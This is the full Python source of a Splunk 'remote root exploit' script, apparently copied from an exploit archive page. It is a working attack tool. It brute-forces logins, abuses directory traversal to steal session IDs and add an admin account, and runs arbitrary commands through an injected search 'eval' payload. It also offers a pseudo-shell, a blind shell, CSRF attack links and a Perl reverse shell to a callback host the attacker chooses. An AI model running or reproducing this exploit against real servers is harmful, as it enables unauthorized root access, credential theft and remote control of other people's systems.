from sec1httplib.requestbuilder import Requestobj from sec1httplib.thread_dispatcher import * import threading import re import urlparse import sys import urllib import base64 from optparse import OptionParser import sys """ Source: http://www.sec-1.com/blog/?p=233 Splunk remote root exploit. Author: Gary O'leary-Steele @ Sec-1 Ltd Date: 5th September 2011 Release date: Private Full Package: http://www.exploit-db.com/sploits/18245.zip C:\git\splunk>python splunk_exploit.py -h Usage: Run splunk_exploit.py -h to see usage options Options: --version show program's version number and exit -h, --help show this help message and exit -t TARGETHOST IP Address or hostname of target splunk server -c Generate CSRF URL only -w SPLUNKWEB_PORT The Splunk admin interface port (Default: 8000) -d SPLUNKD_PORT The Splunkd Web API port (Default: 8089) -u USERFILE File containing usernames for use in dictionary attack -p PASSFILE File containing passwords for use in dictionary attack -U USERNAME Admin username (if known) -P PASSWORD Admin pasword (if known) ToDo: Fix bug when attemping to get home dir """ #Set this to use a proxy #Requestobj.set_proxy("127.0.0.1","8080") Requestobj.verbose = 0 misc_lock = threading.Lock() # Counter used in bruteforce class Counter(): def __init__(self): self.l = threading.Lock() def set_total(self,total): self.statictotal = total self.total = total def sub(self): with self.l: if self.total !=0: self.total = self.total - 1 def print_remaining(self): with self.l: print "[i] %s of %s remaining" % (self.total,self.statictotal) counter = Counter() def request_factory_splunkd(targeturl,username,password,splunk_object): "Factory to generate attempt_login functions" global counter def attempt_login(): # Dont continue if we already have admin if splunk_object.got_admin == 1: return False login_url = "{0}/services/auth/login".format(targeturl.rstrip()) r = Requestobj(login_url) poststr = "username={0}&password={1}".format(username.rstrip(),password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() counter.sub() counter.print_remaining() if result.find_data("Remote login disabled because you are using a free license"): print "[i] Free licence in use. No remote login required" print "[!] run the exploit again with the -f flag" sys.exit() if result.find_data("sessionKey"): print "[***] Cracked: %s:%s\n" % (username.rstrip(),password.rstrip()) try: if splunk_object.user_is_admin(username.rstrip(),password.rstrip()): splunk_object.username = username.rstrip() splunk_object.password = password.rstrip() splunk_object.got_admin =1 #print "ADMIN",splunk_object.got_admin splunk_object.session_key = re.findall("(.+?)",result.body)[0] except Exception as err: print "[i] Error getting auth details",err return (username,password) else: pass return attempt_login def request_factory_splunkweb(targeturl,username,password,cval,splunk_object): "Factory to generate attempt_login functions" global counter def attempt_login(): if splunk_object.got_admin == 1: return False login_url = "{0}/en-GB/account/login".format(targeturl.rstrip()) r = Requestobj(login_url) poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,username.rstrip(),password.rstrip()) r.rawpostdata("POST", poststr) r.set_custom_cookie(copyglobaljar=1) result = r.makerequest() counter.sub() counter.print_remaining() if result.find_data("This resource can be found at"): print "[***] Cracked: %s:%s" % (username.rstrip(),password.rstrip()) try: if splunk_object.user_is_admin(username.rstrip(),password.rstrip()): splunk_object.username = username.rstrip() splunk_object.password = password.rstrip() splunk_object.got_admin =1 except Exception as err: print "[i] Error getting auth details",err return (username,password) else: pass return attempt_login class SplunkTarget(object): def __init__(self,hostaddr,splunkd_port=8089,splunkweb_port=8000): self.splunkd_port = splunkd_port self.splunkweb_port = splunkweb_port self.max_threads = 20 self.username="" self.password = "" self.session_key ="" self.splunk_home = "" self.got_admin = 0 self.web_authed = 0 # are we authed to the web interface self.freelic =0 # Check splunkd server info = Requestobj("https://{0}:{1}/services/server/info/server-info".format(hostaddr,splunkd_port)).makerequest() if info.body: self.splunkd_url = "{0}://{1}".format(urlparse.urlparse(info.url).scheme,urlparse.urlparse(info.url).netloc) else: info = Requestobj("http://{0}:{1}/services/server/info/server-info".format(hostaddr,splunkd_port)).makerequest() self.splunkd_url = "{0}://{1}".format(urlparse.urlparse(info.url).scheme,urlparse.urlparse(info.url).netloc) if "server-info" in info.body: self.splunkd =1 try: self.os_build = re.findall("os_build\">(.+?)<",info.body)[0] self.os_name = re.findall("os_name\">(.+?)<",info.body)[0] self.os_version = re.findall("os_version\">(.+?)<",info.body)[0] self.server_name = re.findall("serverName\">(.+?)<",info.body)[0] self.splunk_version = re.findall("\"version\">(.+?)<",info.body)[0] self.cpu_arch = re.findall("cpu_arch\">(.+?)<",info.body)[0] print "[i] Splunkd server found. Version:{0}".format(self.splunk_version) print "[i] OS:{0} {1} {2}".format(self.os_name,self.os_version,self.os_build) except Exception as err: print "Error getting splunk server info",err else: self.splunkd =0 # Check splunk web splunkweb_info = Requestobj("http://{0}:{1}/en-GB/account/login".format(hostaddr,splunkweb_port)).makerequest() if splunkweb_info.body: self.splunkweb_url = "{0}://{1}".format(urlparse.urlparse(splunkweb_info.url).scheme,urlparse.urlparse(splunkweb_info.url).netloc) else: splunkweb_info = Requestobj("https://{0}:{1}/en-GB/account/login".format(hostaddr,splunkweb_port)).makerequest() self.splunkweb_url = "{0}://{1}".format(urlparse.urlparse(splunkweb_info.url).scheme,urlparse.urlparse(splunkweb_info.url).netloc) if "Splunk" in splunkweb_info.body: print "[i] Splunk web interface discovered" self.splunkweb =1 self.cval="" try: self.cval = splunkweb_info.extract_data_body('name="cval" value="(\d+?)"')[0] print "[i] CVAL:{0}".format(self.cval) except: print "[i] Error getting cval" self.splunkweb =0 else: self.splunkweb =0 if self.splunkweb ==1: try: url ="{0}/en-GB/manager/system/licensing".format(self.splunkweb_url) lic = Requestobj(url).makerequest() if "

Free license group

" in lic.body: print "[i] Configured with free licence. No auth required" #if not self.splunkd: # print "[i] Cannot connect to splunkd using free licence" # sys.exit() self.got_admin=1 self.username="admin" self.password="admin" self.web_authed=1 self.splunkd=0 self.freelic=1 self.pop_shell() except Exception as err: print "error",err exit() def account_bruteforce(self,userfile,passfile): global counter q = ThreadDispatcher(store_return=1,max_threads=self.max_threads) for username in set(open(userfile).readlines()): for password in set(open(passfile).readlines()): if self.splunkd == 1: q.add(request_factory_splunkd(self.splunkd_url,username,password,self)) elif self.splunkweb==1: q.add(request_factory_splunkweb(self.splunkweb_url,username,password,self.cval,self)) else: print "[Error] Not connected" sys.exit() counter.set_total(len(q.call_queue)) q.start() for x in range(q.return_queue._qsize()): username, password = q.return_queue.get(x) username = username.rstrip() password = password.rstrip() print "[***] Cracked: %s:%s" % (username,password) def user_is_admin(self,username,password): if self.splunkd == 1: # attempt to auth via splunkd to get a sessionkey self.username = username self.password = password self.splunkd_auth() url = Requestobj("{0}/services/authentication/httpauth-tokens".format(self.splunkd_url)) url.basic_auth(username,password) context = url.makerequest() if 'httpauth-tokens' in context.body: self.got_admin =1 return True else: return False elif self.splunkweb == 1: with misc_lock: self.username = username self.password = password if self.splunkweb_auth(): admin_only = Requestobj("{0}/en-US/manager/launcher/server/settings/settings?action=edit".format(self.splunkweb_url)).makerequest() if admin_only.find_data("Port that Splunk Web uses"): print "[i] User:{0} IS AN ADMIN.".format(username) return True else: print "[i] User:{0} is not an admin".format(username) else: pass else: print "Not Connected" return False def search_payload_cmd(self,payload): "Generate a command execution payload" encoded = urllib.quote(base64.b64encode(payload)) encodedpl = """search index=_internal source=*splunkd.log |mappy x=eval("sys.modules['os'].system(base64.b64decode('%s'))")""" % encoded #print encodedpl return encodedpl def get_splunk_home(self): if not self.username or not self.password: print "[i] Valid username and password required" sys.exit() try: r = Requestobj("{0}/services/properties/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fetc%2fsplunk-launch/default/SPLUNK_HOME".format(self.splunkd_url)) r.basic_auth(self.username,self.password) splunkdir = r.makerequest() if "ERROR" not in splunkdir.body and "Remote login disabled" not in splunkdir.body and self.splunkd: self.splunk_home = splunkdir.body.strip() else: print "[***] Could not get home dir setting default.." if "windows" in self.os_name.lower(): self.splunk_home = "c:\\program files\\splunk" else: self.splunk_home = "/opt/splunk" print "Setting Splunk home dir to:{0}".format(self.splunk_home) return self.splunk_home except Exception as err: print "[i] Error occured while attempting to read splunk home dir",err def splunkd_auth(self): login_url = "{0}/services/auth/login".format(self.splunkd_url) r = Requestobj(login_url) poststr = "username={0}&password={1}".format(self.username.rstrip(),self.password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() if result.find_data("Remote login disabled because you are using a free license"): print "[i] Free licence in use. No remote login required" print "[!] run the exploit again with the -f flag" sys.exit() if result.find_data("sessionKey"): self.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0] return True else: return False def splunkweb_auth(self): if self.web_authed == 1: return True login_page = Requestobj("{0}/en-GB/account/login".format(self.splunkweb_url)).makerequest() # Get session cookie cval="" cval = login_page.extract_data_body('name="cval" value="(\d+?)"') if cval: cval = cval[0] r = Requestobj(login_page.url) poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,self.username.rstrip(),self.password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() if result.find_data("This resource can be found at"): return True self.web_authed = 1 else: print "[i] Login Failed" exit() def add_admin(self,username,password,sessionKey): # look for 201 if self.splunkd == 1 and self.username and self.password: url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url)) url.basic_auth(self.username,self.password) url.rawpostdata("POST","roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=".format(username,password)) url.add_header("authorization","Splunk {0}".format(sessionKey)) result = url.makerequest() if str(result.code) == "201": return True else: return False else: print "[!] Not connected to splunkd. Check port and creds" return False def dump_session_ids(self): "Exploits dir traversal issue to dump session ids" print "[i] Attemping to dump sessions" if self.splunkd == 1 and self.username and self.password: #url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url)) url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url)) url.basic_auth(self.username,self.password) result = url.makerequest() sessions=[] if "session=" in result.body: print "[i] Session ID's extracted from web_service.log" sessions = re.findall("session=(.+?)[<\s]",result.body) for session in set(sessions): print "[SESSION]",session return set(sessions) def perl_revshell(self,revhost,port): cmd="""perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (revhost,port) self.search_exploit_cmd(cmd) def search_exploit_cmd(self,command): "Execute commands via search exploit." if self.splunkweb == 1 and self.got_admin: if self.web_authed == 0: self.splunkweb_auth() print "[i] Executing Command:{0}".format(command) attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) shell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url)) shell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body)) for c in shell_req.get_cookiejar(): if "session" in c.name: shell_req.add_header("X-Requested-With","XMLHttpRequest") shell_req.add_header("X-Splunk-Session",c.value) x = shell_req.makerequest() elif self.splunkd == 1 and self.got_admin and self.session_key: print "[i] Executing Command:{0}".format(command) attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) shell_req = Requestobj("{0}/servicesNS/admin/search/search/jobs".format(self.splunkd_url)) shell_req.rawpostdata("POST","ui_dispatch_app=search&search={0}&required_field_list=%2A&ui_dispatch_view=flashtimeline&max_count=10000&time_format=%25s.%25Q&latest_time=&status_buckets=300&earliest_time=&auto_cancel=100".format(attack_body)) shell_req.add_header("authorization","Splunk {0}".format(self.session_key)) x = shell_req.makerequest() else: print "Session",self.session_key print "Admin",self.got_admin print "Splunkd",self.splunkd print "[i] Exploit failed. Not connected or access denied" def blind_shell(self): command="" while 1: print command.rstrip() command=raw_input("blind_shell>")# if command.rstrip() == "exit": break self.search_exploit_cmd(command) def get_csrf_link_cmd(self,command): return "{0}/en-US/app/search/flashtimeline?q={1}&earliest=0".format(self.splunkweb_url,self.search_payload_cmd(command)) def get_csrf_link_revshell(self,revhost,port): cmd="""perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (revhost,port) return "{0}/en-US/app/search/flashtimeline?q={1}&earliest=0".format(self.splunkweb_url,self.search_payload_cmd(cmd)) def search_exploit_psudoshell(self): "Execute commands via search exploit. Payload implements a virtual shell" if not self.username or not self.password: print "[i] Valid username and password required" sys.exit() if not self.splunkweb == 1: print "[error] Managment Web Interface required for this payload" return "" if self.web_authed == 0: self.splunkweb_auth() base_dir = self.get_splunk_home() #if not base_dir: # print "Failed to get splunk basedir" # base_dir = "/opt/splunk" command="" while 1: print command.rstrip() command=raw_input("shell>")# if command.rstrip() == "exit": break if "windows" in self.os_name.lower(): tmp = ">\"{0}\\share\splunk\search_mrsparkle\exposed\js\.tmp\"".format(base_dir) command = command + tmp #'"'+ tmp +'"' else: tmp = ">{0}/share/splunk/search_mrsparkle/exposed/js/.tmp".format(base_dir) command = command + tmp attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) psudoshell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url)) psudoshell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body)) for c in psudoshell_req.get_cookiejar(): if "session" in c.name: psudoshell_req.add_header("X-Requested-With","XMLHttpRequest") psudoshell_req.add_header("X-Splunk-Session",c.value) x = psudoshell_req.makerequest() import time time.sleep(3) print Requestobj("{0}/en-US/static/@105575/js/.tmp".format(self.splunkweb_url)).makerequest().body def pop_shell(self): "Prompt for paylod options" "[w00p] We appear to have access. Please select a payload" print "[Payload Options]" if self.splunkweb == 1: print "[1]\tPseudo Interactive Shell" else: print "[DISABLED]\tPseudo Interactive Shell" print "[2]\tPerl Reverse Shell" print "[3]\tCommand Exec (Blind)" option = input("Please select option 1-3:") if option == 1: self.search_exploit_psudoshell() elif option ==2: rev_host = raw_input("Enter Callback Host:") rev_port = raw_input("Enter Callback Port:") self.perl_revshell(rev_host,rev_port) elif option ==3: self.blind_shell() else: print "Invalid option" exit() def main(): banner = "-----==[Slunk Remote Root Exploit]=-----\n" parser = OptionParser(usage="Run %prog -h to see usage options", version="%prog 1.0") parser.add_option("-t", action="store", dest="targethost", help="IP Address or hostname of target splunk server") parser.add_option("-c", action="store_true", # optional because action defaults to "store" dest="csrf", help="Generate CSRF URL only") parser.add_option("-f", action="store_true", # optional because action defaults to "store" dest="free_lic_noauth", help="Target is configured to use a Free licence and does not permit remote auth") parser.add_option("-w", action="store", # optional because action defaults to "store" dest="splunkweb_port", default=8000, help="The Splunk admin interface port (Default: 8000)") parser.add_option("-d", action="store", # optional because action defaults to "store" dest="splunkd_port", default=8089, help="The Splunkd Web API port (Default: 8089)") parser.add_option("-u", action="store", # optional because action defaults to "store" dest="userfile", help="File containing usernames for use in dictionary attack") parser.add_option("-p", action="store", # optional because action defaults to "store" dest="passfile", help="File containing passwords for use in dictionary attack") parser.add_option("-U", action="store", # optional because action defaults to "store" dest="username", help="Admin username (if known)") parser.add_option("-P", action="store", # optional because action defaults to "store" dest="password", help="Admin pasword (if known)") parser.add_option("-e", action="store", # optional because action defaults to "store" dest="userpair", help="Attempt to add admin user via priv up directory traversal magic. Accepts username:password") (options, args) = parser.parse_args() if not options.targethost: parser.error("Target host required") exit() elif options.targethost and options.free_lic_noauth: x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) x.username="admin" x.password="admin" x.got_admin=1 x.splunkd = 0 x.pop_shell() elif options.targethost and options.csrf: x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) print "[*] Enter command to run or enter 'revshell' for a perl reverse shell:" option = raw_input("cmd>") if option =="revshell": rev_host = raw_input("Enter Callback Host:") rev_port = raw_input("Enter Callback Port:") x.perl_revshell(rev_host,rev_port) print x.get_csrf_link_revshell(rev_host,rev_port) else: print x.get_csrf_link_cmd(option.strip()) elif options.targethost and options.username and options.password and options.userpair: print "[i] Attemping priv up" if ":" in options.userpair: username,password = options.userpair.split(":") else: print "-e requires username password pair in format username:password" x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) x.username= options.username x.password = options.password x.splunkd = 1 import time while 1: sessionids= x.dump_session_ids() for session in sessionids: if x.add_admin(username,password,session): print "[i] User Added" exit() time.sleep(2) elif options.targethost and options.username and options.password: print "[i] Using static username and password" x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) x.username= options.username x.password = options.password if x.user_is_admin(options.username,options.password): x.pop_shell() elif options.targethost and options.userfile and options.passfile: print "[i] Lauching bruteforce attack" x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port) x.account_bruteforce(options.userfile,options.passfile) if x.got_admin ==1: x.pop_shell() else: print "Please ensure you have supplied either a username and password or a user and password file to bruteforce" exit() if __name__ == '__main__': main() # 0day.today [2018-01-06] #</article></body></html>

Query Builder